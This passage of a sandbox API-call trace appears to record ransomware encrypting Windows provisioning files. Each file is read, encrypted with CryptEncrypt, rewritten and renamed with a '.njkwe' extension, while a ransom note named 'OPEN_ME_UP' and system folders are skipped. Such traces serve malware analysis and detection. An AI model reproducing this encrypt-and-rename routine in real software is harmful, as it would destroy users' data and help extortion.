lpOverlapped=0x0) returned 1 [0078.331] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.331] CloseHandle (hObject=0x43c) returned 1 [0078.332] GetProcessHeap () returned 0xbe0000 [0078.332] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.332] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 180 [0078.332] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\323__connections_cellular_claro (paraguay)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\323__Connections_Cellular_Claro (Paraguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\323__connections_cellular_claro (paraguay)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.332] GetProcessHeap () returned 0xbe0000 [0078.332] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.333] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90bf7c60, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90bf7c60, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90bf7c60, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cb, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", cAlternateFileName="324__C~1.PRO")) returned 1 [0078.333] lstrcmpiW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.333] lstrcmpiW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.333] lstrcmpiW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.333] lstrcmpiW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.333] lstrcmpiW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.333] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml") returned 162 [0078.333] StrStrIW (lpFirst="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.333] lstrcmpW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.333] lstrcmpW (lpString1="324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.333] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\324__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.333] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\324__connections_cellular_telecel (paraguay)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.333] GetTickCount () returned 0x1153e9c [0078.333] GetTickCount () returned 0x1153e9c [0078.333] GetTickCount () returned 0x1153e9c [0078.333] GetTickCount () returned 0x1153e9c [0078.333] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.334] GetProcessHeap () returned 0xbe0000 [0078.334] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.334] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0078.335] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.335] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2cb, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2cb, lpOverlapped=0x0) returned 1 [0078.335] GetProcessHeap () returned 0xbe0000 [0078.335] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.335] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.335] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.335] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.335] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.336] CloseHandle (hObject=0x43c) returned 1 [0078.336] GetProcessHeap () returned 0xbe0000 [0078.336] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.336] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0078.336] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\324__connections_cellular_telecel (paraguay)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\324__Connections_Cellular_Telecel (Paraguay)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\324__connections_cellular_telecel (paraguay)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.336] GetProcessHeap () returned 0xbe0000 [0078.337] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.337] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c1dec7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c1dec7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c1dec7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ba, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", cAlternateFileName="325__C~1.PRO")) returned 1 [0078.337] lstrcmpiW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.337] lstrcmpiW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.337] lstrcmpiW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.337] lstrcmpiW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.337] lstrcmpiW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.337] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml") returned 156 [0078.337] StrStrIW (lpFirst="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.337] lstrcmpW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.337] lstrcmpW (lpString1="325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.337] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\325__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.337] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\325__connections_cellular_claro (peru)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.337] GetTickCount () returned 0x1153e9c [0078.337] GetTickCount () returned 0x1153e9c [0078.337] GetTickCount () returned 0x1153e9c [0078.337] GetTickCount () returned 0x1153e9c [0078.337] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.338] GetProcessHeap () returned 0xbe0000 [0078.338] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.338] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2ba, lpOverlapped=0x0) returned 1 [0078.339] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd46, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.339] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2ba, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2ba, lpOverlapped=0x0) returned 1 [0078.339] GetProcessHeap () returned 0xbe0000 [0078.339] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.339] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.339] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.339] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.340] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.340] CloseHandle (hObject=0x43c) returned 1 [0078.340] GetProcessHeap () returned 0xbe0000 [0078.340] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.340] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0078.340] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\325__connections_cellular_claro (peru)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\325__Connections_Cellular_Claro (Peru)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\325__connections_cellular_claro (peru)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.341] GetProcessHeap () returned 0xbe0000 [0078.341] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.341] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c1dec7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c1dec7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c1dec7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2c9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", cAlternateFileName="326__C~1.PRO")) returned 1 [0078.341] lstrcmpiW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.341] lstrcmpiW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.341] lstrcmpiW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.341] lstrcmpiW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.341] lstrcmpiW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.341] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml") returned 161 [0078.341] StrStrIW (lpFirst="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.341] lstrcmpW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.341] lstrcmpW (lpString1="326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.341] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\326__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.341] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\326__connections_cellular_telefonica (peru)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.341] GetTickCount () returned 0x1153eab [0078.341] GetTickCount () returned 0x1153eab [0078.341] GetTickCount () returned 0x1153eab [0078.341] GetTickCount () returned 0x1153eab [0078.341] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.342] GetProcessHeap () returned 0xbe0000 [0078.342] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.342] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.343] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd37, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.343] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c9, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c9, lpOverlapped=0x0) returned 1 [0078.343] GetProcessHeap () returned 0xbe0000 [0078.343] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.343] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.343] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.343] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.344] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.344] CloseHandle (hObject=0x43c) returned 1 [0078.344] GetProcessHeap () returned 0xbe0000 [0078.344] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.344] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0078.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\326__connections_cellular_telefonica (peru)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\326__Connections_Cellular_Telefonica (Peru)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\326__connections_cellular_telefonica (peru)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.344] GetProcessHeap () returned 0xbe0000 [0078.344] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.345] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c1dec7, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c1dec7, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c1dec7, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x292, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", cAlternateFileName="327__C~1.PRO")) returned 1 [0078.345] lstrcmpiW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.345] lstrcmpiW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.345] lstrcmpiW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.345] lstrcmpiW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.345] lstrcmpiW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.345] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml") returned 163 [0078.345] StrStrIW (lpFirst="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.345] lstrcmpW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.345] lstrcmpW (lpString1="327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.345] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\327__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.345] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\327__Connections_Cellular_Globe (Philippines)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\327__connections_cellular_globe (philippines)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.345] GetTickCount () returned 0x1153eab [0078.345] GetTickCount () returned 0x1153eab [0078.345] GetTickCount () returned 0x1153eab [0078.345] GetTickCount () returned 0x1153eab [0078.345] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.345] GetProcessHeap () returned 0xbe0000 [0078.345] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.345] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x292, lpOverlapped=0x0) returned 1 [0078.347] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd6e, lpNewFilePointer=0xffffffff, 